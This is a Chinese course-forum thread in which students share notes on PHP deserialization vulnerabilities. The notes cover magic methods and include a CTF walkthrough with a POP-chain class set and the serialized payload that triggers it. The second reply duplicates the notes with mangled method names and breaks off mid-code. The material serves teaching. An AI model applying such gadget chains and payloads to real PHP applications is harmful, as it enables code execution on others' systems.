操作不完整

符啸九天 2023-9-11 2579

源自：视频：2-17 黑客是个魔术师：PHP反序列化漏洞分析与实操讲解-2

问题描述

，没讲反序列在页面中怎么操作

问题出现的环境背景及自己尝试过哪些方法

你期待的结果是什么？实际看到的错误信息又是什么？

5条回答

Editor 2023-9-15

这节还是有些难的，讲师将思路全部讲了，实操得自己去摸索一下，这样才能理解的更深刻。也希望其他人，将研究心得发在笔记里分享出来。

笔记如下：
# PHP反序列化漏洞分析与实操讲解
## 简介

● 序列化(`serialize()`)：将PHP对象压缩并按照一定格式转换成宇符串过程
● 反序列化(`unserialize()`)：从宇符串转换回PHP对象的过程
● 目的：为了方便`PHP`对象的传输和存储

#### 联想到电脑（`diy`）的栗子

![案例1](/upload/attach/202309/202309202115_BJXGFS7HRW38HGC.png)

● PS:主要用于对象的`持久化`（将对象`保存到磁盘`上以便以后`读取`）或在不同系统之间`传输`对象。

### 序列化实例

![](/upload/attach/202309/202309202120_8QS5Z47NJV72CDE.png)
 ![](/upload/attach/202309/202309202121_FSGBD3ZKE2X2ZUU.jpg)
 ![](/upload/attach/202309/202309202121_GK28BVMASDBZF77.jpg)

### 反序列化攻击概述

- `unserialize`接收的参数用户可控，传入构造的字符串，实现攻击
    - 只序列化属性、不序列化方法 
      - `属性名`、`属性值`、`访问控制权限`都存在，但是方法消失
- 要寻找合适的能被我们控制的属性，利用本身存在的方法

### 魔术方法

●  以 开头 
●  (1)`construct()`：当对象创建时会自动调用(但在`unserialize()`时是不会自动调用的)。 
●  (2)`wakeup()` ：`unserialize()`时会自动调用. 当对象所包含的属性数<->不一致 
●  (3)`destruct()`：当对象被销毁时会自动调用。 
●  (4)`toString()`:   当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用 
● `__construct()`
 ![](/upload/attach/202309/202309202121_2HV8JTNND7WRZJV.jpg)

● `__destruct()`
 ![](/upload/attach/202309/202309202122_UVT822WAZW7ZQRG.jpg)

● `__sleep()`
 ![](/upload/attach/202309/202309202122_XQVKUNABPWKDPSM.jpg)

● `__wakeup()`
 ![](/upload/attach/202309/202309202122_UKGWCVXDVEEQGTP.jpg)

● `__toString()`
 ![](/upload/attach/202309/202309202123_9FHHJ997KEZYWTC.jpg)

● `__invoke()`
 ![](/upload/attach/202309/202309202123_B8QB6GD2UCYP8BV.jpg)

● `__call()`
 ![](/upload/attach/202309/202309202123_8SJ5VP7J37SKSND.jpg)

`反序列化` 中常用的魔术方法

__wakeup() //使用 unserialize 时触发
__sleep() //使用 serialize 时触发
__destruct() //对象被销毁时触发
__call() //在对象上下文中调用不可访问的方法时触发
__callstatic () //在静态上下文中调用不可访问的方法时触发
__ construct()//当对象被创建(new)时会自动调用
__get() //用于从不可访问的属性读取数据
__set () //用于将数据写入不可访问的属性
__isset () //在不可访问的属性上调用 isset ()或 empty() 时触发
__unset () //在不可访问的属性上使用 unset () 时触发
__tostring() //把类当作字符串使用时触发
__invoke () //当脚本尝试将对象调用为函数时触发

反序列化攻击样例
 ![](/upload/attach/202309/202309202124_5T6QQCX4MHZSC8Z.jpg)
 ![](/upload/attach/202309/202309202124_8FPTC5T3CRHFBYR.jpg)

●  `Aurora` 对象的`$test` 变量为一个`Evil` 对象 
●  `Evil`对象中的`$test2`变量为我们想要执行的系统命令 
●  `Aurora`对象销毁时，调用`destruct`魔法函数，进而调用`Evil`的`action`函数，进而执行`$test2`中我们想要执行的系统命令 
●  生成`Payload `

### `Review`

![](/upload/attach/202309/202309202125_5WTM8MPU3JCDKUP.jpg)
 ![](/upload/attach/202309/202309202125_7G3G25FZV7JQUGJ.jpg)
 ![](/upload/attach/202309/202309202126_T7T9W77X7696BE6.jpg)

### 实战分析

● 靶机环境 `CTF30小时训练营 实践题目`
根据`Review`提示构造`payload`
● step 
  ○ 1.查看代码逻辑；
  ○ 2.根据代码逻辑构造payload;
 
class allstart
{
        public $var1;
        public $var2;
		public function __construct()
        {
                $this->var1 = new func1();
        }
        public function __destruct()
        {
                $this->var1->test1();
        }
}
class func1
{
        public $var1;
        public $var2;
	    public function __construct()
        {
                $this->var1 = new func2();
        }
        public function test1()
        {
            $this->var1->test2();
        }
}    
class func2
{
		//step3: func2->__call()->在`对象上下⽂`中调⽤不可访问的⽅法时触发
        public $var1;
        public $var2;
        public function __construct()
        {
                $this->var1 = new func3();
        }
        public function __call($test2,$arr)
        {
                $s1 = $this->var1;
                $s1();
        }
}
class func3
{
		//step3:func3->__invoke()->concat string
        public $var1;
        public $var2;
        public function __construct()
        {
                $this->var1 = new func4();
        }
        // 尝试将对象`调⽤为函数时`触发
        public function __invoke()
        {
                $this->var2 = "concat string".$this->var1;
        } 
}
class func4
{
		// step2:func4->__tostring()->get_flag()
        public $str1;
        public $str2;
        public function __construct()
        {
                $this->str1 = new toget();
        }
        public function __toString()
        {
                $this->str1->get_flag();
                return "1";
        }
}
class toget
{
		// step1: get_flag()
        public function get_flag()
        {       
                ##echo "flag{***}";
        }
}
$a=new allstart();
echo serialize($a);

O:8:"allstart":2:{s:4:"var1";O:5:"func1":2:{s:4:"var1";O:5:"func2":2:{s:4:"var1";O:5:"func3":2:{s:4:"var1";O:5:"func4":2:{s:4:"str1";O:5:"toget":0:{}s:4:"str2";N;}s:4:"var2";N;}s:4:"var2";N;}s:4:"var2";N;}s:4:"var2";N;}

### 总结
对`Web`中`PHP反序列化`漏洞分析能力得到提高。

Spider_008 2023-9-20

笔记如下：

PHP反序列化漏洞分析与实操讲解

简介

● 序列化(serialize())：将PHP对象压缩并按照一定格式转换成宇符串过程
● 反序列化(unserialize())：从宇符串转换回PHP对象的过程
● 目的：为了方便PHP对象的传输和存储

联想到电脑（`diy`）的栗子

案例1

● PS:主要用于对象的持久化（将对象保存到磁盘上以便以后读取）或在不同系统之间传输对象。

序列化实例

反序列化攻击概述

unserialize接收的参数用户可控，传入构造的字符串，实现攻击
- 只序列化属性、不序列化方法
  - 属性名、属性值、访问控制权限都存在，但是方法消失
要寻找合适的能被我们控制的属性，利用本身存在的方法

魔术方法

● 以开头
● (1)construct()：当对象创建时会自动调用(但在unserialize()时是不会自动调用的)。
● (2)wakeup() ：unserialize()时会自动调用. 当对象所包含的属性数<->不一致
● (3)destruct()：当对象被销毁时会自动调用。
● (4)toString(): 当反序列化后的对象被输出在模板中的时候（转换成字符串的时候）自动调用
● __construct()

● __destruct()

● __sleep()

● __wakeup()

● __toString()

● __invoke()

● __call()

反序列化 中常用的魔术方法

wakeup() //使用 unserialize 时触发 sleep() //使用 serialize 时触发
destruct() //对象被销毁时触发 call() //在对象上下文中调用不可访问的方法时触发
callstatic () //在静态上下文中调用不可访问的方法时触发 construct()//当对象被创建(new)时会自动调用
get() //用于从不可访问的属性读取数据 set () //用于将数据写入不可访问的属性
isset () //在不可访问的属性上调用 isset ()或 empty() 时触发 unset () //在不可访问的属性上使用 unset () 时触发
tostring() //把类当作字符串使用时触发 invoke () //当脚本尝试将对象调用为函数时触发

反序列化攻击样例

● Aurora 对象的$test 变量为一个Evil 对象
● Evil对象中的$test2变量为我们想要执行的系统命令
● Aurora对象销毁时，调用destruct魔法函数，进而调用Evil的action函数，进而执行$test2中我们想要执行的系统命令
● 生成Payload

`Review`

实战分析

● 靶机环境 CTF30小时训练营实践题目
根据Review提示构造payload
● step
○ 1.查看代码逻辑；
○ 2.根据代码逻辑构造payload;

class allstart
{
public $var1;
public $var2;
public function construct()
{
$this->var1 = new func1();
}
public function destruct()
{
$this->var1->test1();
}
}
class func1
{
public $var1;
public $var2;
public function construct()
{
$this->var1 = new func2();
}
public function test1()
{
$this->var1->test2();
}
}
class func2
{
//step3: func2->call()->在对象上下⽂中调⽤不可访问的⽅法时触发
public $var1;
public $var2;
public function construct()
{
$this->var1 = new func3();
}
public function call($test2,$arr)
{
$s1 = $this->var1;
$s1();
}
}
class func3
{
//step3:func3->invoke()->concat string
public $var1;
public $var2;
public function construct()
{
$this->var1 = new func4();
}
// 尝试将对象调⽤为函数时触发
public function invoke()
{
$this->var2 = "concat string".$this->var1;
}
}
class func4
{
// step2:func4->tostring()->get_flag()
public $str1;
public $str2;
public function construct()
{
$this->str1 = new toget();
}
public function toString()
{
$this->str1->get_flag();
return "1";
}
}
class toget
{
// step1: get_flag()
public function get_flag()
{